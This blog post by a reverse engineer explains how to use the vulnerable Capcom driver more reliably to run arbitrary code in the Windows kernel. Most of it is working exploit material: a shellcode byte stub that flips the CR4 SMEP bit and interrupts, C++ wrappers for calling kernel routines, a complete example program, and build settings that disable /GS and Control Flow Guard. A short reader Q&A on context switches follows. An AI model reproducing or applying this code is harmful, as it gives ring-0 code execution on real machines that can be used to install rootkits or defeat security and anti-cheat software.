Escaping SMEP Hell: Exploiting Capcom Driver In a Safe Manner

Trapped in a SMEP disabled payload not being able to do anything reliably? You have come to the right place.

I’ve seen so many people using Capcom driver in an unsafe manner that I wanted to make this post, simply explaining why some practices are incredibly unsafe and how we can fix this. When these problems are pointed out, the reply most of the times is “works on my machine /shrug” but when you are not the only user you are setting yourself up for failure (speaking from personal experience). It is true that Capcom driver is inherently unsafe, however with certain changes we can make it much more reliable.

There are two ways I’ve seen Capcom driver being used:
1) Stay _disable()’d and pray the NT routines with IRQL requirements somehow work.
2) Call _enable() and pray no context switch happens / patchguard doesn’t get angry.

The problem with enabling interrupts is that during execution a context switch might happen, resetting CR4 value, enabling SMEP again. This means when we return to our code in user-mode we are going to bug-check. But we still need interrupts to be enabled to call certain functions in kernel so we don’t have a choice… or do we?

Yes we do, we can rely on a small trick, a property of ExAllocatePoolWithTag to be specific.

When we make a small allocation (smaller than 0xFE0 bytes) in a non-special pool, ExAllocatePoolWithTag will only actually allocate new pages for our pool if it cannot find a block for our size and it cannot split any large blocks to complete our allocation — which never happens — and luckily for us, this process does not require interrupts to be enabled.

PVOID __stdcall ExAllocatePoolWithTag(POOL_TYPE PoolType, SIZE_T NumberOfBytes, ULONG Tag)
{
  ...
  if ( !MmSpecialPoolTag || !ExpUseSpecialPool(NumberOfBytes_, (unsigned int)v10) )
  {
LABEL_10:
    if ( NumberOfBytes_ > 0xFE0 )
    {
      result = (PVOID)ExpAllocateBigPool(0i64, v5, NumberOfBytes_, v10, 0);
      if ( result )
        return result;
      goto LABEL_260;
    }
    ...
    // Proceeds to allocate a small pool ...
    ...

We are going to allocate a stub in kernel memory that executes these calls for us.

0x0F, 0x20, 0xE0,                                // mov    rax,cr4               ; -
0x48, 0x0F, 0xBA, 0xE8, 0x14,                    // bts    rax,0x14              ; | will be nop'd if no SMEP support
0x0F, 0x22, 0xE0,                                // mov    cr4,rax               ; -
0xFB,                                            // sti
0x48, 0x8D, 0x05, 0x07, 0x00, 0x00, 0x00,        // lea    rax,[rip+0x7]         ; continue
0x8F, 0x40, 0x12,                                // pop    QWORD PTR [rax+0x12]  ; ret_store
0x50,                                            // push rax
0xFF, 0x60, 0x1A,                                // jmp    QWORD PTR [rax+0x1a]  ; call_store
0xFA,                                            // cli
0x0F, 0x20, 0xE1,                                // mov    rcx,cr4
0x48, 0x0F, 0xBA, 0xF1, 0x14,                    // btr    rcx,0x14
0x0F, 0x22, 0xE1,                                // mov    cr4,rcx
0xFF, 0x25, 0x00, 0x00, 0x00, 0x00,              // jmp    QWORD PTR [rip+0x0]   ; ret_store

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // ret_store:  dq 0
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // call_store: dq 0

This small stub enables SMEP and interrupts, saves return pointer to the allocated space, replaces it to point to our epilogue (which disables interrupts & SMEP, and returns to saved pointer) and jumps to the procedure.

We are going to initialize and call it like below:

NON_PAGED_CODE static void Khk_AllocatePassiveStub()
{
  PVOID Out = ( PVOID ) Khk_ExAllocatePool( 0ull, sizeof( Kh_PassiveCallStubData ) );
  Np_memcpy( Out, Kh_PassiveCallStubData, sizeof( Kh_PassiveCallStubData ) );
  Khk_PassiveCallStub = ( fnPassiveCall ) Out;
}

template<typename ...Params>
NON_PAGED_CODE static uint64_t Khk_CallPassive( PVOID Ptr, Params &&... params )
{
  *( PVOID* ) ( ( ( PUCHAR ) Khk_PassiveCallStub ) + Kh_PassiveCallStubCallStoreOffset ) = Ptr;
  return Khk_PassiveCallStub( std::forward<Params>( params ) ... );
}

static void Khu_Init( CapcomContext* CpCtx, KernelContext* KrCtx )
{
  int CpuInfo[ 4 ];
  __cpuid( CpuInfo, 0x7 );
  
  if ( !( CpuInfo[ 1 ] & ( 1 << 7 ) ) ) // EBX : 1 << 7 = SMEP
  {
    printf( "[+] No SMEP support!\n" );
    memset( Kh_PassiveCallStubData, 0x90, Kh_PassiveCallStubSmepEnabledOffset );
  }

  Khk_ExAllocatePool = KrCtx->GetProcAddress<fnFreeCall>( "ExAllocatePool" );
  CpCtx->ExecuteInKernel( Khk_AllocatePassiveStub );
}

// Example usage

Khu_Init( CpCtx, KrCtx );
...
CpCtx->ExecuteInKernel( NON_PAGED_LAMBDA()
{
  ...
  Khk_CallPassive( DbgPrint, ... );
  ...
} );

Although this is not thread-safe, it doesn’t really matter to us. Now that we can call functions that require interrupts to be enabled, all we need to do is to make sure our code runs fine while interrupts are disabled too. To achieve this we are simply going to use separate code and data sections for anything related to kernel, VirtualLock to make sure the pages won’t be paged-out and make sure our code does not access any memory that can be paged out. (You can check the Github repo below for the implementation details and no NtLockVirtualMemory is not no-op.)

Here’s an example:

#include <iostream>
#include <assert.h>
#include "LockedMemory.h"
#include "KernelRoutines.h"
#include "CapcomLoader.h"
#include "KernelHelper.h"

int main()
{
  assert( Np_LockSections() );
  
  KernelContext* KrCtx = Kr_InitContext();
  CapcomContext* CpCtx = Cl_InitContext();

  assert( CpCtx );
  assert( KrCtx );

  Khu_Init( CpCtx, KrCtx );
  printf( "[+] Khk_PassiveCall @ %16llx\n", Khk_PassiveCallStub );

  NON_PAGED_DATA static char Format[] = "Jearning how to count: %s %s %s %s %d %d...";
  NON_PAGED_DATA static auto DbgPrint = KrCtx->GetProcAddress<>( "DbgPrint" );
  NON_PAGED_DATA static PVOID AllocatedMemory = 0;

  CpCtx->ExecuteInKernel( NON_PAGED_LAMBDA()
  {
    // When you do something that requires interrupts to be enabled, use Khk_PassiveCall; such as a big memory allocation
    PVOID Out = ( PVOID ) Khk_CallPassive( Khk_ExAllocatePool, 0ull, 0x100000 );
    // Do not use memcpy, memset or ZeroMemory in kernel context; use Np_XXX equivalents
    Np_ZeroMemory( Out, 0x100000 );

    // Make sure all the UM data you reference from kernel has NON_PAGED_DATA prefix
    AllocatedMemory = Out;
    Format[ 0 ] = 'L';

    // Do not call _enable()
    // _enable();

    // When you require a kernel api to be called use KrCtx to get it BEFORE you are in kernel context.
    // MmGetSystemRoutineAddress requires IRQL==PASSIVE_LEVEL and is bad engineering on Capcom's side.

    // You can use data without NON_PAGED_DATA prefix in Khk_PassiveCall though. (the strings in this case)
    Khk_CallPassive( DbgPrint, Format, "1", "2", "3", "4", 5ull, 6ull );
    // Make sure you specify the sizes for the integers (5ull instead of 5)
  } );

  printf( "[+] AllocatedMemory @ %16llx\n", AllocatedMemory );

  Cl_FreeContext( CpCtx );
  Kr_FreeContext( KrCtx );
  
  return 0;
}

Here’s the final wrapper: Github

Guidelines for safe code:

– Use Np_ZeroMemory (stobs) instead of ZeroMemory
– Use Np_memcpy (movsb) instead of memcpy
– Use Np_memset (stosb) instead of memset
– Disable Security Checks (/GS-)
– Disable Control Flow Guard
– Don’t compile in debug mode
– Don’t use any functions that are not NON_PAGED_CODE prefixed (INCLUDING CRT AND STD!)
– Wrap all lambdas with NON_PAGED_LAMBDA
– Make sure all the variables you reference are prefixed NON_PAGED_DATA, unless you are doing so from Khk_CallPassive
– Do not use any ntoskrnl routines with IRQL requirements directly and call them using Khk_CallPassive instead
– Do not enable interrupts
– Get the procedures you need using KrCtx->GetProcAddress<>(…) outside of kernel context
– Invoke nt!memcpy from Khk_CallPassive if you need to copy paged memory
– fnFreeCall and fnPassiveCall are convenient wrappers I use, but they require you to specify sizes (ex: 0ull instead of 0) as it will go with the smallest size possible if you do not specify it and you will end up with garbage higher bytes so specify the size

Share

I'm an independent security researcher and a self-employed reverse engineer; mostly interested in Windows kernel development, low-level programming, and pen-testing anti-cheat, anti-debug, anti-re and anti-tampering software but I also occasionally do machine learning research and GPU accelerated programming.

4 Comments

  1. weizehua Reply

    Hi, im new to windows kernel.
    How do you know that after a context switch, CR0 will be reset?
    I am curious about which register is reseted, and which is not. Could you tell me someting about it?

    1. Can Bölük Post author Reply

      “Reset” was a bad word choice on my side.

      The issue with changing control registers is that Windows assumes every CPU will have the same CRn values.
      When a context switch happens, it will not bother saving the old CRn values of the thread and restoring them later on.

      So if you are unfortunate enough, your thread might get switched to another CPU core and you will all of a sudden have the CRn values you changed “reset”. SMEP will re-activate in our case.

Leave a Reply

Your email address will not be published. Required fields are marked *